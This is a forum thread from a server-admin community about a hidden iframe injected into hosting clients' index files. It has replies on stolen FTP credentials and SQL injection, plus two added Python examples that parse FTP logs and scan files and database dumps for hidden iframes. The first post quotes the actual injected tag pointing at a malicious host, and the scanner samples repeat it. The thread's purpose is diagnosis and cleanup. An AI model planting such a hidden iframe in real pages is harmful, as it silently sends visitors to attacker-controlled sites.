The Community Forums


Iframe attack problem

Discussion in 'General Discussion' started by myeddie7, Dec 19, 2009.

  1. myeddie7

    myeddie7 Member

    Joined:
    Sep 22, 2007
    Messages:
    17
    Likes Received:
    0
    Trophy Points:
    1
    I have a few clients who had an iframe attack. It replaced all index files in many of their directories. The code looks like below:

    PHP:
    <iframe qhdik='gpPJWim3' src='http://1analytics.ws/in.cgi?7' rybbb='Yv9nZtVg' width='0' height='0' style='display:none'></iframe>
    Why/how does this problem happen? Is it a server problem? Or does it come from the client's files themselves? Because they have already changed their passwords to strong ones.

    We also use mod_security and have firewall (csf) installed in our server.

    Thanks
     
  2. derfuhrer2007

    derfuhrer2007 Member

    Joined:
    Dec 15, 2009
    Messages:
    18
    Likes Received:
    0
    Trophy Points:
    1
    In almost all cases it is the client's computer that got virused; it is not a server issue.
     
  3. madaboutlinux

    madaboutlinux Well-Known Member

    Joined:
    Jan 24, 2005
    Messages:
    1,052
    Likes Received:
    2
    Trophy Points:
    38
    Location:
    Earth
    In iframe injection, the majority of the time it's the client's computer which has got viruses/spyware and the passwords are hacked. Once the password is cracked, the files are then uploaded using FTP.

    If you haven't changed the files yet, ask your host to check when the files were actually injected and to check the FTP logs in the /var/log/messages file.
     
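The advice above is to check the FTP log in /var/log/messages for who uploaded the index files and from where. The following is an added example, not code posted in this thread: a small Python parser that reads syslog-style FTP lines, pulls out every upload event, and reports uploads of index files by an account from an IP that account is not expected to log in from. The log lines are constructed for the example in a pure-ftpd-like layout; the exact format on a given server is an assumption, so adjust the regex to match what the real log shows. The `expected_ips` mapping is hypothetical and stands in for whatever the client says their normal addresses are.

```python
import re
from collections import defaultdict

# Constructed sample lines resembling pure-ftpd syslog output; not taken from a real server.
SAMPLE_LOG = """\
Dec 19 02:10:05 host pure-ftpd: (?@198.51.100.7) [INFO] acme is now logged in
Dec 19 02:10:09 host pure-ftpd: (acme@198.51.100.7) [NOTICE] /home/acme//public_html/index.php uploaded  (2048 bytes, 120.00KB/sec)
Dec 19 02:10:11 host pure-ftpd: (acme@198.51.100.7) [NOTICE] /home/acme//public_html/blog/index.html uploaded  (1024 bytes, 90.00KB/sec)
Dec 19 09:41:30 host pure-ftpd: (?@203.0.113.5) [INFO] acme is now logged in
Dec 19 09:41:35 host pure-ftpd: (acme@203.0.113.5) [NOTICE] /home/acme//public_html/images/logo.png downloaded  (5120 bytes, 300.00KB/sec)
Dec 19 11:00:02 host pure-ftpd: (?@192.0.2.9) [WARNING] Authentication failed for user [acme]
"""

# "(user@ip) [LEVEL] message" is the part of each line we care about; the user is "?" before login.
LINE_RE = re.compile(r'pure-ftpd: \((?P<user>[^@]+)@(?P<ip>[^)]+)\) \[(?P<level>\w+)\] (?P<msg>.*)$')
UPLOAD_RE = re.compile(r'^(?P<path>\S+) uploaded')
# Index files are what the thread reports being replaced; extend as needed.
INDEX_RE = re.compile(r'/index\.(php|html?|asp|aspx)$', re.I)


def parse_ftp_uploads(log_text):
    """Return a list of (timestamp, user, ip, path) for every upload event in the log text."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        up = UPLOAD_RE.match(m.group('msg'))
        if not up:
            continue
        ts = line[:15]  # syslog timestamp, e.g. "Dec 19 02:10:09"
        events.append((ts, m.group('user'), m.group('ip'), up.group('path')))
    return events


def suspicious_index_uploads(log_text, expected_ips):
    """Uploads of index files where the source IP is not in expected_ips[user] (hypothetical allow-list)."""
    hits = []
    for ts, user, ip, path in parse_ftp_uploads(log_text):
        if INDEX_RE.search(path) and ip not in expected_ips.get(user, set()):
            hits.append({'time': ts, 'user': user, 'ip': ip, 'path': path})
    return hits


def logins_by_ip(log_text):
    """Count successful logins per (user, ip); a long-standing account suddenly logging in from a new IP stands out."""
    counts = defaultdict(int)
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if m and m.group('msg').endswith('is now logged in'):
            user = m.group('msg').split()[0]
            counts[(user, m.group('ip'))] += 1
    return dict(counts)


if __name__ == '__main__':
    known = {'acme': {'203.0.113.5'}}  # constructed: the client's usual office IP
    for hit in suspicious_index_uploads(SAMPLE_LOG, known):
        print('{time}  {user}  from {ip}  -> {path}'.format(**hit))
    for (user, ip), n in sorted(logins_by_ip(SAMPLE_LOG).items()):
        print('logins: %s from %s: %d' % (user, ip, n))
```

Run it against a copy of the real log (`grep pure-ftpd /var/log/messages > ftp.log`) once the regex matches the server's own line layout. If the uploads were made with the account's valid credentials from an unfamiliar address, that points at a leaked password rather than a server-side hole, which is the distinction the thread is trying to make.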
  4. myeddie7

    myeddie7 Member

    Joined:
    Sep 22, 2007
    Messages:
    17
    Likes Received:
    0
    Trophy Points:
    1
    The problem is the client doesn't believe that the problem really comes from their side/PC. They claimed that they are an expert in PCs and are very much sure that their PC has got no virus/spyware problem.

    I myself manage the server, and from the /var/log/messages log, I found that there was download/upload from client accounts from an overseas IP.

    It's just that I don't know how the client's username/password had been exposed to others.

    In the server, there are about 500 accounts, and only 2 or 3 clients who always have iframe problem.

    Thanks
     
  5. Data 1

    Data 1 Well-Known Member

    Joined:
    May 25, 2008
    Messages:
    113
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Columbus Ohio
    cPanel Access Level:
    DataCenter Provider
    The IP will be spoofed but if you check the log I bet it was uploaded as that user, just not with their IP.

    I have experienced this many times (some recently) and in most cases the logs will state it was uploaded by the username of the site. If the name near the end of the log string is the username on the account, at BEST they have an easy password and it was guessed. At worst it was a virus on their computer.

    A good argument for not saving passwords in FTP/SSH programs. It is actually safer to have a text file on your desktop named "passwords_for_ftp_sites.txt" than to save them in the actual program.
     
  6. madaboutlinux

    madaboutlinux Well-Known Member

    Joined:
    Jan 24, 2005
    Messages:
    1,052
    Likes Received:
    2
    Trophy Points:
    38
    Location:
    Earth
    Mostly it's a virus on the client's computer which results in the password being hacked and sites being injected.
     
  7. trevHCS

    trevHCS Well-Known Member

    Joined:
    Nov 1, 2003
    Messages:
    69
    Likes Received:
    1
    Trophy Points:
    8
    Another common one is if the pages are generated dynamically involving a database they might well have dodgy code on their site which is allowing SQL injection attacks.

    Check for any databases and if they have any, look inside them for "iframe" or similar. In that case again it's their problem. Mind you, could charge them for potentially damaging your servers.

    As for the "computer expert" routine - if they were that much of an expert they'd be running their own servers, so dismiss that as total codswallop. What they mean is they think they know what they're doing, thus they're 10x more dangerous than my mother on a computer. :)

    Saw an FTP rootkit virus a couple of years back that no AV program seemed to be able to spot. Eventually tracked via a packet sniffer and an F-Prot rootkit sniffer program, but it was quite clever in that it didn't do the same change more than once.

    So unless they're packet sniffing and such like they ain't a computer expert and therefore should be treated with the same contempt as a double glazing salesman.

    Trev
     
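Two checks come up in the thread: looking through the site's files for the injected tag, and looking inside the databases for "iframe" in case the content was planted through the application rather than FTP. The following is an added example, not code from any poster, that does both with one scanner: it parses each `<iframe>` tag's attributes and flags the ones that are hidden (zero width/height or `display:none`/`visibility:hidden`, the signature of the tag quoted in the first post), walks a directory tree of web files, and also accepts a SQL dump, undoing the `\'` escaping a dump uses so the attributes parse. The sample files, dump rows and the `malicious.example` URL are constructed for the example.

```python
import os
import re

# Constructed samples, not real client files.
SAMPLE_INDEX = """<html><body>
<h1>Welcome</h1>
<iframe width="560" height="315" src="https://video.example/embed/abc"></iframe>
<iframe qhdik='gpPJWim3' src='http://malicious.example/in.cgi?7' rybbb='Yv9nZtVg' width='0' height='0' style='display:none'></iframe>
</body></html>
"""
SAMPLE_CLEAN = """<html><body><iframe width="560" height="315" src="https://video.example/embed/abc"></iframe></body></html>"""
# A mysqldump-style row: single quotes inside the string value are escaped as \'
SAMPLE_DB_DUMP = r"""INSERT INTO `posts` VALUES (1,'Hello world');
INSERT INTO `posts` VALUES (2,'<p>News</p><iframe src=\'http://malicious.example/in.cgi?9\' width=\'0\' height=\'0\'></iframe>');
"""

IFRAME_RE = re.compile(r'<iframe\b([^>]*)>', re.I | re.S)
# name=value pairs with double-, single- or un-quoted values
ATTR_RE = re.compile(r'''([\w:-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))''', re.S)


def parse_attrs(attr_text):
    """Turn the attribute string of a tag into a lower-cased {name: value} dict."""
    attrs = {}
    for m in ATTR_RE.finditer(attr_text):
        attrs[m.group(1).lower()] = m.group(2) or m.group(3) or m.group(4) or ''
    return attrs


def is_hidden(attrs):
    """True for the classic injection signature: zero-sized or CSS-hidden frame."""
    style = attrs.get('style', '').replace(' ', '').lower()
    return (attrs.get('width', '') in ('0', '0px')
            or attrs.get('height', '') in ('0', '0px')
            or 'display:none' in style
            or 'visibility:hidden' in style)


def find_hidden_iframes(text):
    """Return [{'src': ..., 'tag': ...}] for every hidden iframe in an HTML/PHP file or a SQL dump."""
    # Undo SQL-dump escaping so quoted attribute values inside dumped strings parse normally.
    text = text.replace("\\'", "'").replace('\\"', '"')
    findings = []
    for m in IFRAME_RE.finditer(text):
        attrs = parse_attrs(m.group(1))
        if is_hidden(attrs):
            findings.append({'src': attrs.get('src', ''), 'tag': m.group(0)})
    return findings


def scan_tree(root, exts=('.php', '.html', '.htm', '.js', '.sql')):
    """Walk root and return {path: findings} for files that contain hidden iframes."""
    results = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, 'r', encoding='utf-8', errors='replace') as fh:
                    hits = find_hidden_iframes(fh.read())
            except OSError:
                continue  # unreadable file; report separately if you care
            if hits:
                results[path] = hits
    return results


def demo_scan():
    """Write the constructed samples into a temp dir, scan it, return {filename: hit count}."""
    import tempfile
    with tempfile.TemporaryDirectory() as tmp:
        for name, body in (('index.php', SAMPLE_INDEX), ('clean.html', SAMPLE_CLEAN), ('dump.sql', SAMPLE_DB_DUMP)):
            with open(os.path.join(tmp, name), 'w', encoding='utf-8') as fh:
                fh.write(body)
        return {os.path.basename(p): len(h) for p, h in scan_tree(tmp).items()}


if __name__ == '__main__':
    for fname, count in sorted(demo_scan().items()):
        print('%s: %d hidden iframe(s)' % (fname, count))
```

Point `scan_tree` at the account's `public_html` (or at a `mysqldump` output file) to get a list of affected files and the `src` values, which is what you need both to clean up and to show the client where the tag ended up; a hit inside the database dump rather than in files is the sign the injection came through the web application, as the post above suggests.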
  8. myeddie7

    myeddie7 Member

    Joined:
    Sep 22, 2007
    Messages:
    17
    Likes Received:
    0
    Trophy Points:
    1
    I also always remind our clients to always be careful with the scripts they are using, especially plugin/addon scripts.

    Because the script they are using may be the cause of their problem.

    BTW, we have mod_security to block 'SQL injection attack'.

    Thanks
     